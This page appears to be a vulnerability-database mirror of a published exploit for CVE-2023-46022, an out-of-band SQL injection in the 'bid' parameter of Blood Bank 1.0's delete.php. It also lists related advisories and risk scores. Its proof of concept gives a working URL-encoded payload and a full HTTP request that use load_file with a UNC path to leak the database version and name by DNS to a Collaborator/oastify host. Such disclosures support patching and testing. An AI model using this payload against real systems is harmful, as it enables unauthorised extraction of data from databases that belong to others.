Vulners
Lucene search
Blood Bank 1.0 SQL Injection
🗓️ 20 Mar 2024 00:00:00Reported by Ersin ErenlerType 
packetstorm🔗 packetstormsecurity.com👁 395 Views
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | Exploit for SQL Injection in Code-Projects Blood_Bank | 11 Nov 202310:54 | – | githubexploit |
 | CVE-2023-46022 | 14 Nov 202322:15 | – | attackerkb |
 | Code-Projects Blood Bank Security Breach | 14 Nov 202300:00 | – | cnnvd |
 | CVE-2023-46022 | 14 Nov 202300:00 | – | cve |
 | CVE-2023-46022 | 14 Nov 202300:00 | – | cvelist |
 | Blood Bank 1.0 - 'bid' SQLi | 20 Mar 202400:00 | – | exploitdb |
 | EUVD-2023-50284 | 3 Oct 202520:07 | – | euvd |
 | CVE-2023-46022 | 14 Nov 202322:15 | – | nvd |
 | CVE-2023-46022 | 14 Nov 202322:15 | – | osv |
 | Sql injection | 14 Nov 202322:15 | – | prion |
10
`# Exploit Title: Blood Bank 1.0 - 'bid' SQLi
# Date: 2023-11-15
# Exploit Author: Ersin Erenler
# Vendor Homepage: https://code-projects.org/blood-bank-in-php-with-source-code
# Software Link: https://download-media.code-projects.org/2020/11/Blood_Bank_In_PHP_With_Source_code.zip
# Version: 1.0
# Tested on: Windows/Linux, Apache 2.4.54, PHP 8.2.0
# CVE : CVE-2023-46022
-------------------------------------------------------------------------------
# Description:
The 'bid' parameter in the /delete.php file of Code-Projects Blood Bank V1.0 is susceptible to Out-of-Band SQL Injection. This vulnerability stems from inadequate protection mechanisms, allowing attackers to exploit the parameter using Burp Collaborator to initiate OOB SQL injection attacks. Through this technique, an attacker can potentially extract sensitive information from the databases.
Vulnerable File: /delete.php
Parameter Name: bid
# Proof of Concept:
----------------------
1. Intercept the request to cancel.php via Burp Suite
2. Inject the payload to the vulnerable parameters
3. Payload: 3'%2b(select%20load_file(concat('\\\\',version(),'.',database(),'.collaborator-domain\\a.txt')))%2b'
4. Example request for bid parameter:
---
GET /bloodbank/file/delete.php?bid=3'%2b(select%20load_file(concat('\\\\',version(),'.',database(),'.domain.oastify.com\\a.txt')))%2b' HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Referer: http://localhost/bloodbank/bloodinfo.php
Cookie: PHPSESSID=<some-cookie-value>
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
---
5. Database and version information is seized via Burp Suite Collaborator
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
20 Mar 2024 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 3.17.8
EPSS0.00457
SSVC